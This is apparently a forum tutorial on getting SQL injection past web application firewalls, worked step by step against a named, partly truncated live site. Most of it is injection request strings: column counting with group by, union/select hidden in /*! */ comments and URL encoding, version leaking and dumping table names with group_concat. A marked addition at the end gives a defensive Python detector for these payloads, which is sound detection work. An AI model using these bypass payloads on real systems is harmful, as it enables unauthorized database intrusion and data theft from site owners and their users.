
Simple WAF Bypass For Different Errors


Sn1p3r


Simple WAF Bypass

 

Today I will give you an idea for "WAF bypass with errors 403, 404, 406 and also URL encoding".

 

http://wonderlandthe...rpark.php?wid=5

This is our target, and it is vulnerable.

 

Find the number of columns:-

 

Let's try to find the number of columns.

 

http://wonderlandthe...rpark.php?wid=5 order by 1--

It does not work and gives an error, which means order does not work.

Sometimes, in some cases, order does not work, so then try to use group.

That means just replace the order with group.

 

like:

http://wonderlandthe...rpark.php?wid=5 group by 1--

It works :-) Like this, we increase the number until we get an error.

 

http://wonderlandthe...rpark.php?wid=5 group by 4--

We get an error, which means it has 3 columns.

 

Now check the "union function"

http://wonderlandthe...park.php?wid=-5 union select 123--

It does not work :/ It gives an error with 404 and 406.

Now I will tell you a little bit about the 404 and 406 errors.

Error 404:

When we get a 404 error, we need to use a filter and other things. But on this website the filter/special comment works.

The special comment is /*! and */. Using it, we can bypass the 404 error.

Error 406:

When we get a 406 error, we need to bypass it with union URL encoding.

Now to the point.

We use the special comment/filter with URL encoding to bypass on our website, like:

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 123--

Bypassed.

But I will tell you about the 403 error.

When we get a 403 error, we need to use overlapping on the union and select,

like:- /*!00000union*/ /*!00000select*/

 

Now back to our target:

When we use the union function, we do not see any vulnerable column number on the page, but we see something like a broken picture, which means that the vulnerable column number is hidden in the HTML code.

Before opening the code, we will change the query a little to make the vulnerable number easy to see, like:

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111111--

Now open the code, press Ctrl+F and enter 1: no result. Then enter 11: no result. Then enter 111, and we will get the vulnerable number.

 

Now find the "Version"

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111version()--

It does not work; there is an error on the (). Now use URL encoding:

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111version%28%29--

Bypassed. Now open the HTML code, press Ctrl+F and enter 5.1, and you will see the version, like 5.1.73-cll.

Now I will try to print the version on the page using concat().

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111concat%28version%28%29%29--

It works, but also in the HTML code. Now I use an HTML tag: use '">' before the version and ' after the version; you can also use the HTML tag in hex.

Let's try to print the version on the page:

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111concat%28'">'version%28%29'

Worked.

 

 

EXTRACTING DATABASE TABLES:-

I will do it using URL encoding and the filter, like:

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111group_concat%28/*!'">'table_name*/'

Worked :-) Done.
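
A defender's view of the requests in the post above, as an added example that is not part of the original post: a Python sketch that URL-decodes a parameter value and unwraps MySQL `/*! ... */` comments before matching, so the encoded and comment-wrapped forms are flagged the same way as the plain ones. The sample values, signature names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed parameter values modelled on the requests in the post above.
SAMPLES = [
    "5",
    "5 group by 4--",
    "-5 /*!%55nion*/ /*!%53elect*/ 123--",
    "-5 /*!00000union*/ /*!00000select*/ 123--",
    "-5 /*!%55nion*/ /*!%53elect*/ 111version%28%29--",
]

# What a filter matching the raw request bytes effectively does.
NAIVE = re.compile(r"union\s+select", re.I)

# MySQL executes the body of /*! ... */ comments (and of /*!NNNNN ... */ when
# the server version is at least NNNNN), so they are unwrapped, not discarded.
# Ordinary /* ... */ comments act as whitespace and become a space.
VERSIONED = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
PLAIN = re.compile(r"/\*.*?\*/", re.S)

SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b"),
    "column_probe": re.compile(r"\b(?:order|group)\s+by\s+\d+\s*(?:--|#|$)"),
    "recon_function": re.compile(r"(?<![a-z_])(?:version|group_concat|concat)\s*\("),
}

def normalize(value, max_rounds=3):
    """Reduce a parameter value to roughly what the database will parse."""
    for _ in range(max_rounds):  # bounded: also covers double encoding
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    previous = None
    while previous != value:  # repeat so stacked wrappers are all removed
        previous = value
        value = VERSIONED.sub(r" \1 ", value)
    value = PLAIN.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()

def classify(value):
    """Return the names of the signatures that match after normalization."""
    norm = normalize(value)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(norm))

if __name__ == "__main__":
    for sample in SAMPLES:
        raw_hit = bool(NAIVE.search(sample))
        print(f"{sample!r}: raw={raw_hit} normalized={classify(sample)}")
```

Normalizing before matching only improves detection; the underlying fix is a parameterized query for `wid`.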
